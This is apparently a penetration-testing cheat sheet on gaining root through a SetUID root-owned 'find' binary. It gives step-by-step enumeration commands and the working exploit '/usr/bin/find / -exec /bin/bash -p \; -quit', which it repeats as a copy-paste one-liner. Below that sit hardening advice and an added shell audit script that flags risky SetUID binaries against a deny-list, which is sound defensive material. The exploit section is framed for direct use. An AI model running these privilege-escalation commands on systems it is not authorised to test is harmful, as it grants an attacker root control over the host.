🧨 Privilege Escalation via SUID find Binary
🔍 Summary
If the find binary is SetUID and owned by root, you can use it to execute arbitrary commands as root — including spawning a root shell.
🔐 Why It Works
SetUID (the 4000 permission bit, the one `find / -perm -4000` matches) makes a binary execute with the file owner's privileges, not the caller's. If a binary is owned by root and is SetUID, it runs as root even when invoked by a low-privilege user.
find supports -exec, which runs arbitrary commands.
By default, when bash detects that it is being executed as a SetUID binary (e.g., owned by root but started by a normal user, so the effective UID differs from the real UID), it drops the elevated privileges for security reasons and refuses to keep running as root.
If you use find to execute a shell that supports -p (like bash, rbash, or sh), the -p flag tells the shell not to drop privileges, giving you a root shell.
🧪 Step-by-Step Exploitation
🔎 1. Find SUID binaries
find / -perm -4000 2>/dev/null
✅ Look for /usr/bin/find
🔍 2. Check if find is root-owned and has SUID
ls -l /usr/bin/find
Output should look like:
-rwsr-xr-x 1 root root ... /usr/bin/find
The s in rws confirms SUID.
🔎 3. Find an executable shell
Check which shells are present:
cat /etc/shells
Then check their permissions:
while read -r shell; do ls -l "$shell" 2>/dev/null; done < /etc/shells
✅ Look for:
- /bin/bash, /bin/sh, or /bin/rbash
- Preferably bash or symlinks to bash, which supports the -p flag
🚀 4. Exploit with find + shell
Spawn a root shell:
/usr/bin/find / -exec /bin/bash -p \; -quit
Or:
/usr/bin/find / -exec /bin/rbash -p \; -quit
Confirm you're root:
whoami
🧷 Mitigation (For Hardening Notes)
If you're a defender or auditing a system:
- NEVER give SetUID to binaries like find, vim, cp, etc.
- Remove the bit where it has been set: chmod u-s /usr/bin/find
- Use AppArmor or SELinux to restrict execution
- Regularly audit with: find / -perm -4000 -type f 2>/dev/null
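The audit step above only lists SetUID files; deciding which of them matter is still manual. The following POSIX sh helper is an added example (not part of the original note) that applies the same check the note uses in step 2, a mode of `-rws...` with owner root, to `ls -l` output and flags hits whose basename is on a short deny-list of programs that can run arbitrary commands (the list is an assumption; extend it for your environment). The sample `ls -l` lines at the bottom are constructed, not from a real host.

```shell
#!/bin/sh
# Added example: flag root-owned SetUID binaries that can run arbitrary commands.
# Real use on a host:
#   ls -l $(find / -perm -4000 -type f 2>/dev/null) | audit_suid
# Exit status 1 means at least one risky binary was found (handy for cron/CI).

# Deny-list of basenames (assumption; extend as needed).
RISKY_NAMES="find vim vi cp mv bash sh dash python python3 perl nmap less more awk"

# is_root_suid LINE: 0 if an `ls -l` LINE describes a root-owned SetUID regular file.
is_root_suid() {
    set -- $1                    # split the ls -l line into fields
    mode=$1; owner=$3
    case "$mode" in
        -rws*) [ "$owner" = "root" ] && return 0 ;;   # regular file, owner rwx + setuid
    esac
    return 1
}

# is_risky PATH: 0 if PATH's basename is on the deny-list.
is_risky() {
    base=${1##*/}
    for n in $RISKY_NAMES; do
        [ "$base" = "$n" ] && return 0
    done
    return 1
}

# audit_suid: read `ls -l` lines on stdin, print "RISKY <path>" per hit,
# return 1 if any hit was found, 0 otherwise.
audit_suid() {
    hits=0
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        is_root_suid "$line" || continue
        path=${line##* }         # last field of the ls -l line (paths without spaces)
        if is_risky "$path"; then
            printf 'RISKY %s\n' "$path"
            hits=$((hits + 1))
        fi
    done
    [ "$hits" -eq 0 ]
}

# Constructed sample ls -l output (not captured from a real system).
SAMPLE='-rwsr-xr-x 1 root root 282088 Mar 23  2022 /usr/bin/find
-rwsr-xr-x 1 root root 59976 Feb  6  2022 /usr/bin/passwd
-rwxr-xr-x 1 root root 1396520 Jan  6  2022 /bin/bash
-rwsr-xr-x 1 nobody nobody 12345 Jan  1  2022 /opt/tool/cp'

# Run with AUDIT_DEMO=1 to see the sample audited: prints "RISKY /usr/bin/find".
if [ "${AUDIT_DEMO:-0}" = "1" ]; then
    printf '%s\n' "$SAMPLE" | audit_suid
fi
```

passwd is SetUID root by design and is not on the deny-list, so it is listed but not flagged; the nobody-owned cp is SetUID but cannot grant root, so is_root_suid skips it. Anything the helper flags is a candidate for `chmod u-s`, or for confinement under AppArmor or SELinux if the SetUID bit is genuinely required.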
✅ Quick Copy-Paste One-Liner
/usr/bin/find / -exec /bin/bash -p \; -quit
If find isn't available:
ls -l /bin /sbin /usr/bin /usr/sbin 2>/dev/null | grep rws